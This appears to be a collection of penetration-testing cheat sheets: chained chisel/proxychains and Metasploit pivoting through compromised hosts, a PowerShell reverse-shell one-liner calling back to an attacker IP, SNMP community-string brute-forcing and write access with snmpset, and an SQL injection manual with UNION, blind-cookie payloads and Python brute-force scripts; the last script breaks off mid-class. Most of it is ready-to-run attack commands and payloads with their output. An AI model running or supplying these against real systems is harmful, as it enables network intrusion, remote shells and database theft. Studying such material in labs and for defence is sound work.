Only machine2 can reach machine3.

We have compromised machine1 and machine2 and have a reverse shell on machine2.
To pivot through machine2 to machine3 we chain a second hop: run a chisel server on machine1, have machine2 connect to it as a client, and let machine2 act as the SOCKS proxy for the 192.168.4.0/24 side.

Let's do it step by step for clarity.

On my Kali
```
chisel server -p 5555 --reverse
```

On machine1

```
./chisel32 client 192.168.2.129:5555 R:1234:socks
```

Now grab another shell on machine1 the same way you got the first one (the first shell is busy running the chisel client).

In that second shell run chisel as a server on machine1
```
./chisel32 server -p 6666 --reverse
```

Now on machine2
```
./chisel32 client 192.168.3.128:6666 R:7777:socks
```

machine2 connects to machine1's interface on the 192.168.3.0/24 side (192.168.3.128), and machine1 now has a SOCKS5 listener on port 7777 whose connections exit from machine2, i.e. into 192.168.4.0/24.

We are almost done.

Edit /etc/proxychains4.conf and add these two lines
```
socks5 127.0.0.1 1234
socks5 127.0.0.1 7777
```

In strict chain mode proxychains connects to each proxy through the previous one, so the second entry `127.0.0.1 7777` is resolved from machine1's point of view (it is machine1's own loopback), not from Kali's.

Run the proxychains nmap scan
```
$ proxychains nmap -p80 -Pn -sV 192.168.4.128
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 23:43 EDT
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK
Nmap scan report for 192.168.4.128
Host is up (0.055s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
```

You can see the chain from 1234 -> 7777 and then into the .4 subnet

kali:1234 -> machine1:7777 -> machine2 -> machine3:anyport

If there are more networks, repeat the pattern: a chisel server on the last compromised host, a `R:<port>:socks` client on the next one, and one more `socks5 127.0.0.1 <port>` line in proxychains. With the setup above, machine1 and machine2 act as SOCKS hops.

---

## Metasploit

msfconsole has a `route add` command for adding routes by hand, but Metasploit also has a module that adds routes for the subnets of a compromised machine automatically.
This autoroute module is the equivalent of `route add` driven from the session's own routing table.

**autoroute** post module
```
post/multi/manage/autoroute
```

Use that one and set the options
```
set SESSION 1
set SUBNET 192.168.3.0
run
```

```
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module.
[*] Running module against metasploitable.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.3.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.2.0/255.255.255.0 from host's routing table.

```

These routes only affect traffic generated inside Metasploit (its own modules and the socks_proxy server below); tools outside msfconsole still need proxychains or a port forward.

Now use any module to scan 192.168.3.129

```
auxiliary/scanner/portscan/tcp
```

```
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.3.129: - 192.168.3.129:23 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:22 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:21 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:25 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:53 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:80 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:111 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:139 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:445 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:513 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:514 - TCP OPEN
[+] 192.168.3.129: - 192.168.3.129:512 - TCP OPEN
[*] 192.168.3.129: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
We can see the open ports.

**meterpreter portfwd**

In a meterpreter session we can use the portfwd command to forward a local port to a destination behind the session
```
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L   Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R   Indicates a reverse port forward.
    -h   Help banner.
    -i   Index of the port forward entry to interact with (see the "list" command).
    -l   Forward: local port to listen on. Reverse: local port to connect to.
    -p   Forward: remote port to connect to. Reverse: remote port to listen on.
    -r   Forward: remote host to connect to.
```

Now let's forward to 192.168.3.129

```
meterpreter > portfwd add -l 4444 -p 80 -r 192.168.3.129
[*] Local TCP relay created: :4444 <-> 192.168.3.129:80
```

Now go to the browser and open 127.0.0.1:4444
You can see the webpage of 192.168.3.129.

Again this is a one-to-one port forward.

Let's use the socks module in Metasploit instead.
Make sure the route is added first, else this will not work: the proxy can only reach subnets that have a route to a session.

```
use auxiliary/server/socks_proxy
```

The defaults are SRVHOST 0.0.0.0, SRVPORT 1080 and VERSION 5. Change SRVPORT if 1080 is taken, and set SRVHOST to 127.0.0.1 unless other hosts really need to use the proxy (on 0.0.0.0 anyone who can reach your box gets a free path into the internal network), then
```
run
```
Now the SOCKS server is up.

Edit /etc/proxychains4.conf
```
socks5 127.0.0.1 1080
```
Now do the proxychains nmap scan

```
$ proxychains nmap -p80 -Pn -sV 192.168.3.129
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 00:38 EDT
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK
Nmap scan report for 192.168.3.129
Host is up (0.0099s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 (DAV/2)
```


-------------------------------------------------------------------------------- /Reverse Shells.md: --------------------------------------------------------------------------------
# Reverse Shells

PowerShell mini reverse shell. Change the IP and port to your listener (for example `nc -lvnp 1234` on 10.10.17.29) before running it.

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.17.29',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

```
-------------------------------------------------------------------------------- /SNMP Cheatsheet.md: --------------------------------------------------------------------------------
# SNMP Cheatsheet

Tags : #snmp #strings #nse #snmp-info #snmp-brute
#snmpwalk #snmpget #snmpset #snmptranslate #snmp_enum #snmp_login #hydra #medusa

## Basics
If you don't know SNMP, no problem; here are
resources to learn about SNMP and its terminology
```
https://www.networkmanagementsoftware.com/snmp-tutorial/

https://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/
```

---

## Lab Setup

Kali linux - 192.168.0.101
Vyatta - 192.168.0.110

---

## Nmap Scan
UDP scan
```
$ sudo nmap -sU -Pn -p161,162 192.168.0.110
[sudo] password for kali:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:53 EDT
Nmap scan report for 192.168.0.110
Host is up (0.00040s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
162/udp closed        snmptrap
MAC Address: 00:0C:29:A9:41:81 (VMware)
```

`open|filtered` is normal for UDP: an agent that silently drops packets carrying a wrong community string looks exactly like a firewall, so nmap cannot tell the two apart from the probe alone. The script scan below settles it, because snmp-info gets an answer.

Default script scan

```
$ sudo nmap -p161 -sC -sU -Pn 192.168.0.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:54 EDT
Nmap scan report for 192.168.0.110
Host is up (0.00039s latency).

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 72b2d3418298b260
|   snmpEngineBoots: 3
|_  snmpEngineTime: 43m38s
MAC Address: 00:0C:29:A9:41:81 (VMware)
```

snmp-info needs no community string (it uses the SNMPv3 engine discovery exchange), which is why it returns data here. The other default SNMP scripts query with the community string `public` (override it with `--script-args snmpcommunity=<string>`); if that string is wrong we don't get much information.
In our case the administrator has changed the defaults.

Let's use snmp-brute.
It takes a lot of time and there are faster tools, but we give it a try.

The syntax is
```
---
-- @usage
-- nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ]
--
-- @args snmp-brute.communitiesdb The filename of a list of community strings to try.
```

We need to specify the wordlist file in that argument
```
$ sudo nmap -Pn -p161 -sU --script=snmp-brute --script-args=snmp-brute.communitiesdb=/home/kali/tools/wordlists/rockyou.txt 192.168.0.110
```

It takes time. rockyou is a password list, not a community-string list; a short SNMP-specific list such as the Metasploit one used with medusa below is usually a better first pass.
Let's use other tools.

---

## Onesixtyone
The syntax is simple
```
$ onesixtyone -c wordlist ipaddress
```

```
$ onesixtyone -c /home/kali/tools/wordlists/rockyou.txt 192.168.0.110
```

---

## Hydra

To check the syntax of any protocol module
```
hydra -U protocolname

hydra -U snmp

hydra -U ssh
```

Now brute-forcing 192.168.0.110
```
$ hydra -P /home/kali/tools/wordlists/rockyou.txt -m 1 192.168.0.110 snmp
```

`-m` selects the SNMP version (1, 2 or 3); `hydra -U snmp` lists the full module options.

---

## Medusa

We can use medusa to brute-force SNMP community strings.
SNMP has no username, but medusa still requires `-u`, so any value works (it shows up as `(null)` in the output).

```
$ medusa -u user -P /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt -M snmp -h 192.168.0.110
```

We get the output
```
ACCOUNT CHECK: [snmp] Host: 192.168.0.110 (1 of 1, 0 complete) User: (null) (0 of 1, 1 complete) Password: test (1 of 0 complete)
ACCOUNT FOUND: [snmp] Host: 192.168.0.110 User: (null) Password: test [SUCCESS]
ACCOUNT CHECK: [snmp] Host: 192.168.0.110 (1 of 1, 0 complete) User: (null) (0 of 1, 2 complete) Password: test2 (2 of 0 complete)
ACCOUNT FOUND: [snmp] Host: 192.168.0.110 User: (null) Password: test2 [SUCCESS]
```
We got two strings, the same ones the Metasploit module finds below.

---

## snmpcheck

After getting a community string we can enumerate the host with the `snmpcheck` tool (packaged as `snmp-check` on Kali)

```
snmpcheck -c string ipaddress
```

---

## snmpwalk

With a read-only or read-write string we can dump the whole MIB tree using `snmpwalk`

```
$ snmpwalk -v1 -c test 192.168.0.110 | head -n 10
iso.3.6.1.2.1.1.1.0 = STRING: "Vyatta VC6.5R1"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.30803
iso.3.6.1.2.1.1.3.0 = Timeticks: (515600) 1:25:56.00
iso.3.6.1.2.1.1.4.0 = STRING: "root"
iso.3.6.1.2.1.1.5.0 = STRING: "vyatta"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
iso.3.6.1.2.1.1.7.0 = INTEGER: 14
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.2.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
```

`-c` specifies the community string.
`-v1` selects SNMPv1; use `-v2c` for SNMPv2c. SNMPv3 does not use community strings at all: it needs a user plus auth/priv settings (`-v3 -u user -l authPriv -a SHA -A authpass -x AES -X privpass`).

The OIDs print as raw numbers (`iso.3.6.1.2.1.1...`) because Kali ships without the MIB files; install `snmp-mibs-downloader` and comment out the `mibs :` line in /etc/snmp/snmp.conf to see names like `sysDescr.0` instead. The ten entries above are the system group: sysDescr, sysObjectID, sysUpTime, sysContact, sysName, sysLocation, sysServices and sysORLastChange, followed by the first sysORTable rows.

---

## snmpset
```
TYPE: one of i, u, t, a, o, s, x, d, b
i: INTEGER, u: unsigned INTEGER, t: TIMETICKS, a: IPADDRESS
o: OBJID, s: STRING, x: HEX STRING, d: DECIMAL STRING, b: BITS
U: unsigned int64, I: signed int64, F: float, D: double
```

With a read-write string we can modify writable OIDs
```
$ snmpset -v1 -c test2 192.168.0.110 iso.3.6.1.2.1.1.6.0 s hacked
```

`iso.3.6.1.2.1.1.6.0` is sysLocation.0, a harmless string that proves write access. On a real device the same mechanism can reconfigure it (for example shutting an interface through ifAdminStatus), so treat a read-write community string as a credential, not just a finding.

You can verify with **snmpwalk**
```
$ snmpwalk -v1 -c test 192.168.0.110 | head -n 10
iso.3.6.1.2.1.1.1.0 = STRING: "Vyatta VC6.5R1"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.30803
iso.3.6.1.2.1.1.3.0 = Timeticks: (592391) 1:38:43.91
iso.3.6.1.2.1.1.4.0 = STRING: "root"
iso.3.6.1.2.1.1.5.0 = STRING: "vyatta"
iso.3.6.1.2.1.1.6.0 = STRING: "hacked"
iso.3.6.1.2.1.1.7.0 = INTEGER: 14
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.2.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
```

---

## snmpget

To read a single OID use **snmpget**

```
$ snmpget -v1 -c test2 192.168.0.110 iso.3.6.1.2.1.1.6.0

iso.3.6.1.2.1.1.6.0 = STRING: "hacked"

```

---

## Metasploit
```
search snmp
```
gives a lot of modules.

Let's brute-force SNMP community strings with **snmp_login**.
Set the options; you can leave the default pass file as it is or point it at rockyou.txt.
After setting all the options, **run barry run**
```
setg RHOSTS 192.168.0.110
set STOP_ON_SUCCESS true
run
```

```
msf6 auxiliary(scanner/snmp/snmp_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.0.110:161 - Login Successful: test2 (Access level: read-write); Proof (sysDescr.0): Vyatta VC6.5R1
[+] 192.168.0.110:161 - Login Successful: test (Access level: read-only); Proof (sysDescr.0): Vyatta VC6.5R1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

We got two strings, and the module also reports the access level of each
```
test - read-only access
test2 - read-write access
```

Let's try **snmp_enum**
This is a post-exploitation-style module: you need a working community string.
Set the options
```
setg RHOSTS 192.168.0.110
set COMMUNITY test
run
```
Run the module and you get all the information about the host.

Metasploit also has snmp_set to change OID values
```
set COMMUNITY test2
set OID oid
set OIDVALUE hackedagain
run
```

We get an error because the **iso** prefix is not recognised by Metasploit's SNMP library: it expects a purely numeric OID
```
msf6 auxiliary(scanner/snmp/snmp_set) > set OID iso.3.6.1.2.1.1.6.0
OID => iso.3.6.1.2.1.1.6.0
msf6 auxiliary(scanner/snmp/snmp_set) > set OIDVALUE hacked2
OIDVALUE => hacked2
msf6 auxiliary(scanner/snmp/snmp_set) > run

[*] Try to connect to 192.168.0.110...
[-] 192.168.0.110 Error: ArgumentError ["iso", "3", "6", "1", "2", "1", "1", "6", "0"]:Array not a valid object ID ["/usr/share/metasploit-framework/lib/snmp/varbind.rb:161:in `rescue in initialize'", "/usr/share/metasploit-framework/lib/snmp/varbind.rb:152:in `initialize'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:243:in `new'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:243:in `parse_oid'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:218:in `oid'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:167:in `varbind_list'", "/usr/share/metasploit-framework/lib/snmp/manager.rb:239:in `get'", "/usr/share/metasploit-framework/lib/snmp/manager.rb:262:in `get_value'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/snmp/snmp_set.rb:48:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:120:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```
We need to translate that OID.
We can use the tool **snmptranslate**
```
$ snmptranslate -On iso.3.6.1.2.1.1.6.0
.1.3.6.1.2.1.1.6.0
```
-On means output numerically (`iso` is just the name of the top-level arc 1).

Now we can use that
```
msf6 auxiliary(scanner/snmp/snmp_set) > set OID 1.3.6.1.2.1.1.6.0
OID => 1.3.6.1.2.1.1.6.0
msf6 auxiliary(scanner/snmp/snmp_set) > run

[*] Try to connect to 192.168.0.110...
[*] Check initial value : OID 1.3.6.1.2.1.1.6.0 => hacked
[*] Set new value : OID 1.3.6.1.2.1.1.6.0 => hacked2
[*] Check new value : OID 1.3.6.1.2.1.1.6.0 => hacked2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

---
-------------------------------------------------------------------------------- /SQL injection Manual.md: --------------------------------------------------------------------------------
# SQL injection Manual

Tags : #sqli #sqlinjection #sql #blindsqli #pysqli #sqli_cheatsheet

## Info
SQL comments : double hyphen followed by a space, `-- -` (the trailing `-` keeps the space that MySQL requires after `--` from being trimmed away)
hash `#` (MySQL only)

---

Find all the URLs that take parameters.
Example :
```
https://www.example.com/products?id=2
https://www.example.com/products?category=Computers
https://www.example.com/products?id=2&username=tech69
```
Now put a single quote ' or a double quote " into the parameter and look for errors (or any change) in the response.

An error means the quote broke the query, i.e. the parameter reaches the database unescaped; that is a strong sign of SQL injection, which the TRUE/FALSE tests below confirm.

----

## OR and AND Injection

Now that we have found our injection point (parameter),
let's use OR and AND clauses to force TRUE and FALSE results
```
https://www.example.com/products?id=2' OR 1=1 -- -
https://www.example.com/products?id=2' AND 1=2 -- -
https://www.example.com/products?id=2' OR 1=1 #
https://www.example.com/products?id=2' AND 1=2 #
```
`OR 1=1` should return every row (or the normal page), `AND 1=2` should return nothing; if the two responses differ, the parameter is injectable even when no error message is shown.

We can try the same trick to bypass a login page (`' OR 1=1 -- -` in the username field). Most of the time it will not work, but it is worth a try.
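The quote test and the OR/AND true/false probes above, run against a tiny in-memory SQLite database. This is an added example, not code from the original page: the `products` and `users` tables and their rows are constructed here, `vulnerable_lookup` and `vulnerable_login` stand in for the page's `products?id=` endpoint and a login form that paste user input straight into the SQL text, and `safe_lookup` shows the parameterized form the same payloads cannot break. SQLite treats `--` as a comment like MySQL, so `-- -` works here; `#` does not.

```python
import sqlite3


def make_db():
    """Constructed in-memory target database (not from the page) so the demo runs offline."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'keyboard', 40), (2, 'monitor', 200), (3, 'mouse', 15);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret'), ('wiener', 'peter');
    """)
    return db


def vulnerable_lookup(db, product_id):
    """Stands in for products?id=<value>: the parameter is pasted into the SQL text."""
    sql = "SELECT name FROM products WHERE id = '" + product_id + "'"
    return [row[0] for row in db.execute(sql)]


def safe_lookup(db, product_id):
    """Hardened version: the value is bound as a parameter and can never change the query."""
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in db.execute(sql, (product_id,))]


def vulnerable_login(db, username, password):
    """Stands in for a login form with the same string-concatenation bug."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def probe(db, payload):
    """The page's first test: send the payload and report 'error' or the rows that came back."""
    try:
        return "ok", vulnerable_lookup(db, payload)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "2"))                 # normal request: ('ok', ['monitor'])
    print(probe(db, "2'"))                # the lone quote breaks the query: ('error', ...)
    print(probe(db, "2' OR 1=1 -- -"))    # TRUE condition: every product comes back
    print(probe(db, "2' AND 1=2 -- -"))   # FALSE condition: nothing comes back
    print(vulnerable_login(db, "' OR 1=1 -- -", "x"))   # login bypassed as 'administrator'
    print(safe_lookup(db, "2' OR 1=1 -- -"))            # []: the payload is just a non-matching id
```

The three `probe` calls are the page's detection sequence in order: a bare quote produces an error, `OR 1=1` and `AND 1=2` produce visibly different results. Against `safe_lookup` the payload is an ordinary string compared with the `id` column, which is why parameterized queries are the fix rather than filtering quotes.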
---

## Determining number of columns using ORDER BY

We can sort the results in the response using the **ORDER BY** keyword.
It sorts by column name or by column position.
Suppose the query returns 3 columns: sorting by the 4th column errors because there is no 4th column, so the largest position that still works is the column count.

Sorting by the first column
```
https://www.example.com/products?id=2' ORDER BY 1 -- -
```

Sorting by the second column
```
https://www.example.com/products?id=2' ORDER BY 2-- -
```

Keep increasing the number until the page breaks; if `ORDER BY 3` gives a 500 error while `ORDER BY 2` worked, there are exactly two columns
```
https://www.example.com/products?id=2' ORDER BY 3 -- -
https://www.example.com/products?id=2' ORDER BY 4 -- -


```

---

## UNION Based Injection

We can use a UNION clause to append another SELECT statement and pull its results into the page.

**UNION combines only the results of SELECT statements, and both sides must return the same number of columns with compatible types.**

## Determining number of columns using UNION and SELECT

We can also determine the number of columns the backend query returns with UNION.
First we select a single NULL; an error means the column count of our SELECT does not match the backend query.
Then we add one more NULL and continue;
as soon as we get a 200 response, our number of NULLs equals the number of columns the backend query returns. NULL is used because it is compatible with every column type.

```
https://www.example.com/products?id=2' UNION SELECT NULL -- -
https://www.example.com/products?id=2' UNION SELECT NULL,NULL from dual -- -
https://www.example.com/products?id=2' UNION SELECT NULL,NULL,NULL -- -
and so on ...
```
(`from dual` is needed on Oracle, where every SELECT must have a FROM clause; the other databases accept a bare SELECT.)

---

## Determining VARCHAR column using UNION and SELECT

Now we know how many columns the backend query returns.
Next we need to find which column is of string type,
so instead of NULL we put a string and test each column in turn.

Suppose we found that there are 4 columns
```
https://www.example.com/products?id=2' UNION SELECT 'a',NULL,NULL,NULL -- -
https://www.example.com/products?id=2' UNION SELECT NULL,'a',NULL,NULL from dual -- -
https://www.example.com/products?id=2' UNION SELECT NULL,NULL,'a',NULL -- -
https://www.example.com/products?id=2' UNION SELECT NULL,NULL,NULL,'a' -- -
```
The request that returns 200 tells us which column is of string type.

---

## Getting Information from string column

Say we found the 2nd column is of string type;
we can now read the SQL version and other information through it.

### Default Tables in Different Database types
```
Oracle - dual , v$version , all_tables , all_tab_columns
MySQL,PostgreSQL,MSSQL - information_schema.tables , information_schema.columns
SQLite - sqlite_master
```

For comparison, this is what the version variables look like when queried directly on a MySQL server:
```
mysql> show variables like "%version%"
    -> ;
+-------------------------+-------------------------+
| Variable_name           | Value                   |
+-------------------------+-------------------------+
| innodb_version          | 5.7.34                  |
| protocol_version        | 10                      |
| slave_type_conversions  |                         |
| tls_version             | TLSv1,TLSv1.1,TLSv1.2   |
| version                 | 5.7.34-0ubuntu0.18.04.1 |
| version_comment         | (Ubuntu)                |
| version_compile_machine | x86_64                  |
| version_compile_os      | Linux                   |
+-------------------------+-------------------------+
8 rows in set (0.04 sec)

```

Getting information through the string column
```
https://www.example.com/products?id=2' UNION SELECT NULL,@@version,NULL -- -
https://www.example.com/products?id=2' UNION SELECT NULL,version(),NULL -- -
https://www.example.com/products?id=2' UNION SELECT NULL,BANNER,NULL from v$version -- -
https://www.example.com/products?id=2' UNION SELECT NULL,@@version_compile_machine,NULL -- -
```
(`@@version` works on MySQL and MSSQL, `version()` on MySQL and PostgreSQL, `v$version` on Oracle.)

---

## Dumping all Tables and data

**ORACLE**
```
https://www.example.com/products?id=2' UNION SELECT NULL,TABLE_NAME,NULL from all_tables -- -
https://www.example.com/products?id=2' UNION SELECT NULL,COLUMN_NAME,NULL from all_tab_columns where table_name = 'users' -- -
```
(Oracle stores unquoted identifiers in upper case, so try `'USERS'` as well.)

**MySQL,MSSQL,PostgreSQL**
```
https://www.example.com/products?id=2' UNION SELECT NULL,TABLE_NAME,NULL from information_schema.tables -- -
https://www.example.com/products?id=2' UNION SELECT NULL,COLUMN_NAME,NULL from information_schema.columns where table_name = 'users' -- -
```

Dumping data from columns
```
https://www.example.com/products?id=2' UNION SELECT NULL,CONCAT(column1,'|',column2),NULL from table_name -- -
```
(CONCAT is MySQL/MSSQL syntax; on Oracle and PostgreSQL use `column1||'|'||column2`.)

---

## Blind SQL Injection

Sometimes we get no error and no data in the response, yet the website is still vulnerable to SQL injection.
Example : a value stored in a cookie.
We can inject statements into the cookie.

### Conditional Responses

We inject a FALSE condition and the server sends the normal response;
then we inject a TRUE condition and the server sends a different or slightly different response (for example an extra "Welcome back" message).
That difference means we can inject SQL there.

**FALSE Condition** - default length of response
```
Cookie : TrackingID = abcdef' AND '1'='2
```

**TRUE Condition**
```
Cookie : TrackingID = abcdef' AND '1'='1
```

If the response length > default length
the cookie is vulnerable to blind SQLi.

Verifying which database
```
Cookie : TrackingID = abcdef' AND (SELECT 'a' from dual)='a
Cookie : TrackingID = abcdef' AND (SELECT 'a' from information_schema.tables LIMIT 1)='a
```
(the first is TRUE only on Oracle, the second only on MySQL/PostgreSQL; Oracle has no LIMIT, so it is left off the dual query.)

In blind SQLi we need to brute-force a lot.

Brute-forcing table names
```
Cookie : TrackingID = abcdef' AND (SELECT 'a' from information_schema.columns where table_name='$users$' LIMIT 1)='a
```
Send this to Intruder and brute-force the table names, or script it:

```python
import requests

url = "https://www.example.com/products?id=2"   # page that reads the TrackingId cookie
tables = ['users', 'login', 'hashes']
cookie = 'abcdef'                                # a valid TrackingId value

# baseline: response length when the injected condition is not satisfied
r = requests.get(url)
default_length = len(r.text)
for i in tables:
    # the subquery returns a row (TRUE) only if information_schema knows the table
    final_cookie = cookie + "' AND (SELECT 'a' from information_schema.columns where table_name='{}' LIMIT 1)='a".format(i)
    full_cookie = {"TrackingId": final_cookie}
    temp = requests.get(url, cookies=full_cookie)
    if len(temp.text) > default_length:
        print("{} table exists".format(i))
```

Brute-forcing column names

```
Cookie : TrackingID = abcdef' AND (SELECT SUBSTRING(CONCAT('a',$column_name$),1,1)='a' from users LIMIT 1)='a
```

Determining the maximum length of that column

we can use
```
MAX(LENGTH(column_name))
```

Brute-force the number to find the maximum
```
Cookie : TrackingID = abcdef' AND (SELECT MAX(LENGTH(password)) from users)='$1$
```
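The conditional-response technique above, automated end to end. This is an added example rather than code from the original page: `BlindTarget` is a constructed stand-in for the vulnerable TrackingId cookie (it answers "Welcome back!" only when the injected condition holds, so the TRUE response is longer than the FALSE one, exactly the length check described above), and the users table and the password in it are made up. Instead of trying every letter in turn as the page does, `extract_password` binary-searches first the length and then each character's code, which generalises the same oracle to any printable character and needs about seven requests per character instead of up to thirty-six. The backend here is SQLite (`length`, `substr`, `unicode`); on MySQL or PostgreSQL the equivalents are `LENGTH`, `SUBSTRING`/`SUBSTR` and `ASCII`.

```python
import sqlite3

SECRET = "tq9x2kph"  # constructed administrator password the oracle has to leak


class BlindTarget:
    """Constructed stand-in for the page's vulnerable TrackingId cookie.

    The cookie value is pasted into the SQL text. If the query matches a row the
    page contains 'Welcome back!', otherwise it is the shorter default page.
    Errors are swallowed, so nothing but the response length leaks information.
    """

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE tracking(id TEXT);
            INSERT INTO tracking VALUES ('abcdef');
            CREATE TABLE users(username TEXT, password TEXT);
        """)
        self.db.execute("INSERT INTO users VALUES ('administrator', ?)", (SECRET,))
        self.requests = 0

    def page(self, tracking_id):
        self.requests += 1
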